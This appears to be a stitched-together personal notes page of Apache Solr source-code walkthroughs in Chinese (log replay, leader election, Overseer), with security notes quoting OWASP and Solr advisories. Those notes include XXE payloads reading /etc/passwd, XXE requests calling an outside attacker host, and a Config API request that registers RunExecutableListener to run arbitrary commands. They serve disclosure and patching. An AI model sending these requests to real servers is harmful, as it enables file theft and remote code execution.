https://blog.csdn.net/u011426341/article/details/78940170

　　恢复的流程主要就是三个，一个replay，一个peersync还有一个replicate。下面结合场景，从源码角度分析三个数据恢复场景的流程。

ZkController.register()

　　下面就是关键的流程，先进行节点的选举，然后开始恢复流程，其实这个恢复流程已经涵盖了上面所提到的三个场景。

// public String register(String coreName, final CoreDescriptor desc, boolean recoverReloadedCores, boolean afterExpiration) throws Exception { try (SolrCore core = cc.getCore(desc.getName())) { MDCLoggingContext.setCore(core); } try { ...... ...... try { // If we're a preferred leader, insert ourselves at the head of the queue boolean joinAtHead = false; Replica replica = zkStateReader.getClusterState().getReplica(desc.getCloudDescriptor().getCollectionName(), coreZkNodeName); if (replica != null) { joinAtHead = replica.getBool(SliceMutator.PREFERRED_LEADER_PROP, false); } joinElection(desc, afterExpiration, joinAtHead); // 先进行leader选举 } catch (InterruptedException e) { Thread.currentThread().interrupt(); throw new ZooKeeperException(SolrException.ErrorCode.SERVER_ERROR, "", e); } catch (KeeperException | IOException e) { throw new ZooKeeperException(SolrException.ErrorCode.SERVER_ERROR, "", e); } String leaderUrl = getLeader(cloudDesc, leaderVoteWait + 600000); String ourUrl = ZkCoreNodeProps.getCoreUrl(baseUrl, coreName); log.info("We are " + ourUrl + " and leader is " + leaderUrl); boolean isLeader = leaderUrl.equals(ourUrl); try (SolrCore core = cc.getCore(desc.getName())) { UpdateLog ulog = core.getUpdateHandler().getUpdateLog(); if (!afterExpiration && !core.isReloaded() && ulog != null) { Slice slice = getClusterState().getSlice(collection, shardId); if (slice.getState() != Slice.State.CONSTRUCTION || !isLeader) { Future<UpdateLog.RecoveryInfo> recoveryFuture = core.getUpdateHandler().getUpdateLog().recoverFromLog(); // OK，此处就是一个replay操作的调用 // 因为在节点重启之前可能有未commit的数据，所以此处需要判断tlog是否有结束符，如果没有回进行一次数据回放。 if (recoveryFuture != null) { log.info("Replaying tlog for " + ourUrl + " during startup... NOTE: This can take a while."); recoveryFuture.get(); // NOTE: this could potentially block for recoverFromLog } else { log.info("No LogReplay needed for core=" + core.getName() + " baseURL=" + baseUrl); } } } // 此处是一个标准的恢复流程，会先进性判断是否需要peerSync，如果需要回复的数据量超过100个doc，就直接进行replicate进行index文件的拷贝。 boolean didRecovery = checkRecovery(coreName, desc, recoverReloadedCores, isLeader, cloudDesc, collection, coreZkNodeName, shardId, leaderProps, core, cc, afterExpiration); if (!didRecovery) { publish(desc, Replica.State.ACTIVE); // 如果不需要进行recovery，此处就可以将core置为active的状态，启动成功。 } core.getCoreDescriptor().getCloudDescriptor().setHasRegistered(true); } // make sure we have an update cluster state right away zkStateReader.forceUpdateCollection(collection); return shardId; } finally { MDCLoggingContext.clear(); } }

recoverFromLog

　　主要还是调用LogReplay来进行数据的回放。

  public Future<RecoveryInfo> recoverFromLog() {
    recoveryInfo = new RecoveryInfo();

    List<TransactionLog> recoverLogs = new ArrayList<>(1);
    for (TransactionLog ll : newestLogsOnStartup) {
      if (!ll.try_incref()) continue;

      try {
        if (ll.endsWithCommit()) { // 如果有commit操作，文件末尾都会有一个标示符，这里也就是根据标示符来判断是否需要replay
          ll.decref();
          continue;
        }
      } catch (IOException e) {
        log.error("Error inspecting tlog " + ll, e);
        ll.decref();
        continue;
      }

      recoverLogs.add(ll);
    }

    if (recoverLogs.isEmpty()) return null;

    ExecutorCompletionService<RecoveryInfo> cs = new ExecutorCompletionService<>(recoveryExecutor);
    LogReplayer replayer = new LogReplayer(recoverLogs, false); // 实现逻辑

    versionInfo.blockUpdates();
    try {
      state = State.REPLAYING;
    } finally {
      versionInfo.unblockUpdates();
    }

    // At this point, we are guaranteed that any new updates coming in will see the state as "replaying"

    return cs.submit(replayer, recoveryInfo); // 提交replay操作
  }

LogReplayer

　　tlog中数据的回放，可能也包含了待删除的数据。

public void doReplay(TransactionLog translog) {

https://blog.csdn.net/u011426341/article/details/78939812
关于选举功能就是，每个overseer在zookeeper中进行一次注册，生成一个序列号，哪个overseer的序列号最小，就是leader。这个节点挂了之后，再进行一次选举。

  private void checkIfIamLeader(final ElectionContext context, boolean replacement) throws KeeperException,
      InterruptedException, IOException {
   ......
   ......
   if (leaderSeqNodeName.equals(seqs.get(0))) {
      // I am the leader
      // context分为两个ShardLeaderElectionContext和OverseerElectionContext两个概念都会进行选举。
      try {
        runIamLeaderProcess(context, replacement); // 如果是leader就执行leader任务，也就是处理overseer的逻辑
      } catch (KeeperException.NodeExistsException e) {
        log.error("node exists",e);
        retryElection(context, false);
        return;
      }
    } else {
      // I am not the leader - watch the node below me
      String toWatch = seqs.get(0);
      for (String node : seqs) {
        if (leaderSeqNodeName.equals(node)) {
          break;
        }
        toWatch = node;
      }
      try { // 如果不是leader就创建一个监听ElectionWatcher，如果主节点挂了之后。ElectionWatcher.process()方法就会被调用重新进行选举。
        String watchedNode = holdElectionPath + "/" + toWatch;
        zkClient.getData(watchedNode, watcher = new ElectionWatcher(context.leaderSeqPath, watchedNode, getSeq(context.leaderSeqPath), context), null, true);
        log.info("Watching path {} to know if I could be the leader", watchedNode);
      } catch (KeeperException.SessionExpiredException e) {
        throw e;
      } catch (KeeperException.NoNodeException e) {
        // the previous node disappeared, check if we are the leader again
        checkIfIamLeader(context, true);
      } catch (KeeperException e) {
        // we couldn't set our watch for some other reason, retry
        log.warn("Failed setting watch", e);
        checkIfIamLeader(context, true);
      }
    }
  }

　　OverseerElectionContext.runLeaderProcess会调用OverSeer线程监听分布式队列workQueue的请求。

  void runLeaderProcess(boolean weAreReplacement, int pauseBeforeStartMs) throws KeeperException,
      InterruptedException {
    log.info("I am going to be the leader {}", id);
    final String id = leaderSeqPath
        .substring(leaderSeqPath.lastIndexOf("/") + 1);
    ZkNodeProps myProps = new ZkNodeProps("id", id);

    zkClient.makePath(leaderPath, Utils.toJSON(myProps),
        CreateMode.EPHEMERAL, true);
    if(pauseBeforeStartMs >0){
      try {
        Thread.sleep(pauseBeforeStartMs);
      } catch (InterruptedException e) {
        Thread.interrupted();
        log.warn("Wait interrupted ", e);
      }
    }

    overseer.start(id);
  }

　　OverSeer的工作就是监听WorkQueue，实现方式就是在zookeeper创建一个节点，如果有请求添加到这个节点上，OverSeer就会触发。

    public void run() {

      LeaderStatus isLeader = amILeader();
      while (isLeader == LeaderStatus.DONT_KNOW) {
        log.debug("am_i_leader unclear {}", isLeader);
        isLeader = amILeader();  // not a no, not a yes, try ask again
      }

      log.info("Starting to work on the main queue");
      try {
        ZkStateWriter zkStateWriter = null;
        ClusterState clusterState = null;
        boolean refreshClusterState = true; // let's refresh in the first iteration
        while (!this.isClosed) { // SolrServer启动之后就会一直无限循环。
          ......
          ......
          try {
            while (head != null) { // 如果有请求进来
              byte[] data = head;
              final ZkNodeProps message = ZkNodeProps.load(data);
              log.info("processMessage: queueSize: {}, message = {} current state version: {}", stateUpdateQueue.getStats().getQueueLength(), message, clusterState.getZkClusterStateVersion());
              // we can batch here because workQueue is our fallback in case a ZK write failed
              // 获取处理请求，进行逻辑分发
              clusterState = processQueueItem(message, clusterState, zkStateWriter, true, new ZkStateWriter.ZkWriteCallback() {
                @Override
                public void onEnqueue() throws Exception {
                  workQueue.offer(data);
                }

                @Override
                public void onWrite() throws Exception {
                  // remove everything from workQueue
                  while (workQueue.poll() != null);
                }
              });
              ......
              ......
      }
    }

core API的分发

　　比如说CREATE请求，下面的逻辑就是向所有节点发送http请求，这个请求就是core级别的，接收方就会创建对应的core。

    private List<ZkWriteCommand> processMessage(ClusterState clusterState,
        final ZkNodeProps message, final String operation) {
      CollectionParams.CollectionAction collectionAction = CollectionParams.CollectionAction.get(operation);
      if (collectionAction != null) {
        switch (collectionAction) {
          case CREATE:
            return Collections.singletonList(new ClusterStateMutator(getZkStateReader()).createCollection(clusterState, message));
          case DELETE:
            return Collections.singletonList(new ClusterStateMutator(getZkStateReader()).deleteCollection(clusterState, message));
          case CREATESHARD:
            return Collections.singletonList(new CollectionMutator(getZkStateReader()).createShard(clusterState, message));
          case DELETESHARD:
            return Collections.singletonList(new CollectionMutator(getZkStateReader()).deleteShard(clusterState, message));
          case ADDREPLICA:
            return Collections.singletonList(new SliceMutator(getZkStateReader()).addReplica(clusterState, message));
          case ADDREPLICAPROP:
            return Collections.singletonList(new ReplicaMutator(getZkStateReader()).addReplicaProperty(clusterState, message));
          case DELETEREPLICAPROP:
            return Collections.singletonList(new ReplicaMutator(getZkStateReader()).deleteReplicaProperty(clusterState, message));
          case BALANCESHARDUNIQUE:
            ExclusiveSliceProperty dProp = new ExclusiveSliceProperty(clusterState, message);
            if (dProp.balanceProperty()) {
              String collName = message.getStr(ZkStateReader.COLLECTION_PROP);
              return Collections.singletonList(new ZkWriteCommand(collName, dProp.getDocCollection()));
            }
            break;
          case MODIFYCOLLECTION:
            CollectionsHandler.verifyRuleParams(zkController.getCoreContainer() ,message.getProperties());
            return Collections.singletonList(new CollectionMutator(reader).modifyCollection(clusterState,message));
          case MIGRATESTATEFORMAT:
            return Collections.singletonList(new ClusterStateMutator(reader).migrateStateFormat(clusterState, message));
          default:
            throw new RuntimeException("unknown operation:" + operation
                + " contents:" + message.getProperties());
        }
      } else {
        OverseerAction overseerAction = OverseerAction.get(operation);
        if (overseerAction == null) {
          throw new RuntimeException("unknown operation:" + operation + " contents:" + message.getProperties());
        }
        switch (overseerAction) {
          case STATE:
            return Collections.singletonList(new ReplicaMutator(getZkStateReader()).setState(clusterState, message));
          case LEADER:
            return Collections.singletonList(new SliceMutator(getZkStateReader()).setShardLeader(clusterState, message));
          case DELETECORE:
            return Collections.singletonList(new SliceMutator(getZkStateReader()).removeReplica(clusterState, message));
          case ADDROUTINGRULE:
            return Collections.singletonList(new SliceMutator(getZkStateReader()).addRoutingRule(clusterState, message));
          case REMOVEROUTINGRULE:
            return Collections.singletonList(new SliceMutator(getZkStateReader()).removeRoutingRule(clusterState, message));
          case UPDATESHARDSTATE:
            return Collections.singletonList(new SliceMutator(getZkStateReader()).updateShardState(clusterState, message));
          case QUIT:
            if (myId.equals(message.get("id"))) {
              log.info("Quit command received {}", LeaderElector.getNodeName(myId));
              overseerCollectionConfigSetProcessor.close();
              close();
            } else {
              log.warn("Overseer received wrong QUIT message {}", message);
            }
            break;
          case DOWNNODE:
            return new NodeMutator(getZkStateReader()).downNode(clusterState, message);
          default:
            throw new RuntimeException("unknown operation:" + operation + " contents:" + message.getProperties());
        }
      }

      return Collections.singletonList(ZkStateWriter.NO_OP);
    }

Collection API的下发

　　上面介绍的流程是API请求已经写入分布式队列，然后OverSeer去处理，那么分布式队列是怎么写入请求的呢？还是以CREATE请求为例。
　　创建请求由CollectionsHandler接收，老套路，执行的方法名称还是叫handleRequestBody。

handleResponse

　　在这里就可以看到，创建的请求被添加到一个分布式的Queue中，后端的Overseer就会从queue中取出这个请求，进行分发。

private SolrResponse handleResponse(String operation, ZkNodeProps m, SolrQueryResponse rsp, long timeout) throws KeeperException, InterruptedException { long time = System.nanoTime(); if (m.containsKey(ASYNC) && m.get(ASYNC) != null) { String asyncId = m.getStr(ASYNC); if(asyncId.equals("-1")) { throw new SolrException(ErrorCode.BAD_REQUEST, "requestid can not be -1. It is reserved for cleanup purposes."); } NamedList<String> r = new NamedList<>(); if (coreContainer.getZkController().getOverseerCompletedMap().contains(asyncId) || coreContainer.getZkController().getOverseerFailureMap().contains(asyncId) || coreContainer.getZkController().getOverseerRunningMap().contains(asyncId) || overseerCollectionQueueContains(asyncId)) { r.add("error", "Task with the same requestid already exists."); } else { coreContainer.getZkController().getOverseerCollectionQueue() .offer(Utils.toJSON(m)); } r.add(CoreAdminParams.REQUESTID, (String) m.get(ASYNC)); SolrResponse response = new OverseerSolrResponse(r); rsp.getValues().addAll(response.getResponse()); return response; } QueueEvent event = coreContainer.getZkController() .getOverseerCollectionQueue() .offer(Utils.toJSON(m), timeout); // 就是这个地方了offer就是将请求添加到queue中。 if (event.getBytes() != null) { SolrResponse response = SolrResponse.deserialize(event.getBytes()); // 阻塞式等待返回的结果。不过也设置了超时时间。 rsp.getValues().addAll(response.getResponse()); SimpleOrderedMap exp = (SimpleOrderedMap) response.getResponse().get("exception"); if (exp != null) { Integer code = (Integer) exp.get("rspCode"); rsp.setException(new SolrException(code != null && code != -1 ? ErrorCode.getErrorCode(code) : ErrorCode.SERVER_ERROR, (String)exp.get("msg"))); } return response; } else { if (System.nanoTime() - time >= TimeUnit.NANOSECONDS.convert(timeout, TimeUnit.MILLISECONDS)) { throw new SolrException(ErrorCode.SERVER_ERROR, operation + " the collection time out:" + timeout / 1000 + "s"); } else if (event.getWatchedEvent() != null) { throw new SolrException(ErrorCode.SERVER_ERROR, operation + " the collection error [Watcher fired on path: " + event.getWatchedEvent().getPath() + " state: " + event.getWatchedEvent().getState() + " type " + event.getWatchedEvent().getType() + "]"); } else { throw new SolrException(ErrorCode.SERVER_ERROR, operation + " the collection unknown case"); } } }

Testing
https://github.com/randomizedtesting/randomizedtesting/wiki/Core-Concepts

org.apache.solr.update.processor.DistributedUpdateProcessor.doDefensiveChecks(DistribPhase)

CloudDescriptor cloudDescriptor = req.getCore().getCoreDescriptor().getCloudDescriptor();

Slice mySlice = clusterState.getSlice(collection, cloudDescriptor.getShardId());

boolean localIsLeader = cloudDescriptor.isLeader();

ZkController zoo = req.getCore().getCoreDescriptor().getCoreContainer().getZkController(); Set<String> nodes = zoo.getClusterState().getLiveNodes();

core.addCloseHook(new CloseHook() {})

final ZkStateReader zkStateReader = core.getCoreDescriptor().getCoreContainer().getZkController().getZkStateReader();

org.apache.solr.handler.admin.CollectionsHandler
handleRequestBody(SolrQueryRequest, SolrQueryResponse)
Map<String, Object> result = operation.call(req, rsp, this);

enum CollectionOperation

SolrTestCaseJ4
private static MiniSolrCloudCluster solrCluster;
solrCluster = new MiniSolrCloudCluster(4, createTempDir().toFile(), solrXml, buildJettyConfig("/solr"));

solrCluster.uploadConfigDir(configDir, "conf");

MethodHandles.lookup().lookupClass()

Use System.nanoTime()
public Replica getLeaderRetry(String collection, String shard, int timeout) throws InterruptedException {
long timeoutAt = System.nanoTime() + TimeUnit.NANOSECONDS.convert(timeout, TimeUnit.MILLISECONDS);
while (true) {
Replica leader = getLeader(collection, shard);
if (leader != null) return leader;
if (System.nanoTime() >= timeoutAt || closed) break;
Thread.sleep(GET_LEADER_RETRY_INTERVAL_MS);
}
throw new SolrException(ErrorCode.SERVICE_UNAVAILABLE, "No registered leader was found after waiting for "
+ timeout + "ms " + ", collection: " + collection + " slice: " + shard);
}

Replica leaderReplica = zkController.getZkStateReader().getLeaderRetry(
collection, shardId);
isLeader = leaderReplica.getName().equals(
req.getCore().getCoreDescriptor().getCloudDescriptor()
.getCoreNodeName());

long newCommitGeneration = SegmentInfos.getLastCommitGeneration(directory);
boolean commitHappened = newCommitGeneration != lastCommitGeneration;
lastCommitGeneration = newCommitGeneration;

return commitHappened;

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

There are a few different types of entities, external general/parameter parsed entity often shortened to external entity, that can access local or remote content via a declared system identifier. The system identifier is assumed to be a URI that can be dereferenced (accessed) by the XML processor when processing the entity. The XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier. If the system identifier contains tainted data and the XML processor dereferences this tainted data, the XML processor may disclose confidential information normally not accessible by the application. Similar attack vectors apply the usage of external DTDs, external stylesheets, external schemas, etc. which, when included, allow similar external resource inclusion style attacks.

<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [ <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "expect://id" >]>
    <creds>
       <user>&xxe;</user>
       <pass>mypass</pass>
    </creds>

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet

* SOLR-11477: Disallow resolving of external entities in queryparser/xml/CoreParser by default.
https://issues.apache.org/jira/browse/SOLR-11477

Lucene includes a query parser that is able to create the full-spectrum of Lucene queries, using an XML data structure. Starting from version 5.1 Solr supports "xml" query parser in the search query.

The problem is that lucene xml parser does not explicitly prohibit doctype declaration and expansion of external entities. It is possible to include special entities in the xml document, that point to external files (via file://) or external urls (via http://):

Example usage:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/xxx"><a></a>'}

When Solr is parsing this request, it makes a HTTP request to http://xxx.s.artsploit.com/xxx and treats its content as DOCTYPE definition.

Considering that we can define parser type in the search query, which is very often comes from untrusted user input, e.g. search fields on websites. It allows to an external attacker to make arbitrary HTTP requests to the local SOLR instance and to bypass all firewall restrictions.

For example, this vulnerability could be user to send malicious data to the '/upload' handler:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true"'><a></a>'}

This vulnerability can also be exploited as Blind XXE using ftp wrapper in order to read arbitrary local files from the solrserver.

https://lucene.apache.org/solr/guide/7_0/other-parsers.html

The XmlQParserPlugin extends the QParserPlugin and supports the creation of queries from XML.

The XmlQParser implementation uses the SolrCoreParser class which extends Lucene’s CoreParserclass. XML elements are mapped to QueryBuilder classes as follows:

You can configure your own custom query builders for additional XML elements. The custom builders need to extend the SolrQueryBuilder or the SolrSpanQueryBuilder class. Example solrconfig.xml snippet:

<queryParser name="xmlparser" class="XmlQParserPlugin">
  <str name="MyCustomQuery">com.mycompany.solr.search.MyCustomQueryBuilder</str>
</queryParser>

https://issues.apache.org/jira/secure/attachment/12892047/SOLR-11477.patch
public static final EntityResolver DISALLOW_EXTERNAL_ENTITY_RESOLVER = (String publicId, String systemId) -> {
throw new SAXException(String.format(Locale.ENGLISH,
"External Entity resolving unsupported: publicId=\"%s\" systemId=\"%s\"",
publicId, systemId));
};
private Document parseXML(InputStream pXmlFile) throws ParserException {
final DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setValidating(false);
try {
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
} catch (ParserConfigurationException e) {
// ignore since all implementations are required to support the
// {@link javax.xml.XMLConstants#FEATURE_SECURE_PROCESSING} feature
}
final DocumentBuilder db;
try {
db = dbf.newDocumentBuilder();
} catch (Exception se) {
throw new ParserException("XML Parser configuration error.", se);
}
try {
db.setEntityResolver(getEntityResolver());
db.setErrorHandler(getErrorHandler());
return db.parse(pXmlFile);
} catch (Exception se) {
throw new ParserException("Error parsing XML stream: " + se, se);
}
}

https://issues.apache.org/jira/browse/SOLR-11482

This class should no longer be needed, as replication can be done through Solr Cloud or via ReplicationHandler. The current listener is a security risk, as it can be configured through the Config API. See the report:

Solr "RunExecutableListener" class can be used to execute arbitrary commands on specific events, for example after each update query. The problem is that such listener can be enabled with any parameters just by using Config API with add-listener command.

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json  
Content-Length: 198

{
  "add-listener" : {
    "event":"postCommit",
    "name":"newlistener",
    "class":"solr.RunExecutableListener",
    "exe":"ANYCOMMAND",
    "dir":"/usr/bin/",
    "args":["ANYARGS"]
  }
}

Parameters "exe", "args" and "dir" can be crafted throught the HTTP request during modification of the collection's config. This means that anybody who can send a HTTP request to Solr API is able to execute arbitrary shell commands when "postCommit" event is fired. It leads to execution of arbitrary remote code for a remote attacker.

RunExecutableListener

proc = Runtime.getRuntime().exec(cmd, envp ,dir);

* SOLR-11482: RunExecutableListener was deprecated and is disabled by default for security reasons. Legacy applications still using it must explicitely pass '-Dsolr.enableRunExecutableListener=true' to the Solr command line. Be aware that you should really disable API-based config editing at the same time, using '-Ddisable.configEdit=true'!

throw new SolrException(ErrorCode.UNAUTHORIZED, WARNING_MESSAGE);

https://issues.apache.org/jira/browse/SOLR-10748

Today you can issue a HTTP request parameter stream.body which will by Solr be interpreted as body content on the request, i.e. act as a POST request. This is useful for development and testing but can pose a security risk in production since users/clients with permission to to GET on various endpoints also can post by using stream.body. The classic example is &stream.body=<delete><query>:</query></delete>. And this feature cannot be turned off by configuration, it is not controlled by enableRemoteStreaming.

This jira will add a configuration option requestDispatcher.requestParsers.enableStreamBody to the <requestParsers> tag in solrconfig as well as to the Config API. I propose to set the default value to *false*.

Apart from security concerns, this also aligns well with our v2 API effort which tries to stick to the principle of least surprice in that GET requests shall not be able to modify state. Developers should known how to do a POST today

https://issues.apache.org/jira/browse/SOLR-9623
https://lucene.apache.org/solr/guide/6_6/content-streams.html#ContentStreams-RemoteStreaming

If you enableRemoteStreaming="true" is used, be aware that this allows anyone to send a request to any URL or local file. If DumpRequestHandler is enabled, it will allow anyone to view any file on your system.

https://stackoverflow.com/questions/16857923/remote-streaming-with-solr
http://www.apache.org/dyn/closer.lua/lucene/solr/6.6.2
http://mail-archives.apache.org/mod_mbox/lucene-dev/201710.mbox/%3CCAJEmKoC%2BeQdP-E6BKBVDaR_43fRs1A-hOLO3JYuemmUcr1R%2BTA%40mail.gmail.com%3E

> In all three requests Solr responds with different errors, but all of
> these error are happened after desired actions are executed.
>
> All these vulnerabilities were tested on the latest version of Apache Solr
> with the default cloud config (bin/solr start -e cloud -noprompt)

Common Vulnerabilities and Exposures (CVE)

http://searchfinancialsecurity.techtarget.com/definition/Common-Vulnerabilities-and-Exposures

https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-18263/Apache-Solr.html
https://en.wikipedia.org/wiki/Zero-day_(computing)

Sunday, September 24, 2017

Solr Code Misc